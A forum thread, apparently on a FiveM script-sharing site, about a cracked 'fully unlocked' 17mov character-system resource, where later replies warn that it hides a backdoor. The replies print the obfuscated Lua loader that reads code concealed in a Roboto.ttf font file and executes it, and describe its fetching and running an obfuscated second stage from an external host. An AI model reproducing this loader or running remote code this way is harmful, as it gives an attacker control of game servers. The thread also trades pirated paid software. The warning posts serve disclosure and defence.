Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new

Script 17MOV_CHARACTERSYSTEM FULLY UNLOCKED FULLY TESTED/WORKING 09/25

azizpour

Member
Joined
Mar 5, 2022
Messages
4
Reaction score
0
Points
146
Location
iran
17MOV_CHARACTERSYSTEM FULLY UNLOCKED FULLY TESTED/WORKING 09/25

Preview -

Link -


Hello, can you help?
I had a few problems and fixed them, but there is one problem related to the clothing section, which unfortunately when I get to the last section, the screen goes black and the character customization section no longer loads.
 

Estevan Goti

Member
Joined
Jul 18, 2026
Messages
1
Reaction score
0
Points
16
Location
Brazil
Pacote tem um backdoor bem claro, sou novo no fivem então acredito ter forte ligação com uma Backdoors.

Achei isto em:
local loadFonts = _G[string.char(108, 111, 97, 100)]
loadFonts(LoadResourceFile(GetCurrentResourceName(), '/web/assets/Roboto.ttf'):sub(87565):gsub('%.%+', ''))()

Ele esconde o load, lê código escondido dentro do arquivo Roboto.ttf, limpa uma camuflagem e executa.

O conteúdo escondido baixa código externo de:
e executa a resposta com: assert(load(_b))()

Isso é backdoor/loader remoto. Quem controla essa URL pode executar código no seu servidor.

Os outros pontos encontrados parecem normais do script, mas esse loader remoto sozinho já torna o pacote inseguro.

O link atualmente retorna um script Lua ofuscado com Luraph: -- This file was protected using Luraph Obfuscator v14.7
Detalhes do payload:
Status: 200 OK
Tipo: text/plain
Tamanho: 96.362 caracteres
SHA256: 15ce8fe3aa1a692ac0927ed410c68a33d4f8914eca7f2843b30ef4b945773d81
Ele não é só texto/configuração: no final ele executa o conteúdo ofuscado com algo parecido com:

Conclusão: é perigoso.
Esse link entrega um segundo estágio ofuscado que é executado dentro do servidor. Como está ofuscado, não dá para afirmar 100% tudo que ele faz sem desofuscar ou “detonar” em ambiente isolado, mas o comportamento é típico de loader/backdoor:
Código escondido no Roboto.ttf.
Baixa Lua remoto de fivems.lt/null.
Executa o retorno com load.
O retorno vem ofuscado para dificultar auditoria.

Como disse apenas fiz um estudo sobre mas sem certeza, aqui fica o estudo para que os Admin façam as verificações.
Caso eu esteja errado peço as desculpas.
 

Amezrial

Member
Joined
Dec 6, 2022
Messages
2
Reaction score
4
Points
146
Location
United States
17MOV_CHARACTERSYSTEM FULLY UNLOCKED FULLY TESTED/WORKING 09/25

Preview -

Link -

Do not run this!. It contains a remote-code-execution backdoor.

In [server/skin.lua, lines 27–28 (line 27)](/E:/WinSCP Apollo/Non-Escrow/17mov_CharacterSystem/server/skin.lua:27), it hides executable Lua inside web/assets/Roboto.ttf, loads it, and runs it.
 
Top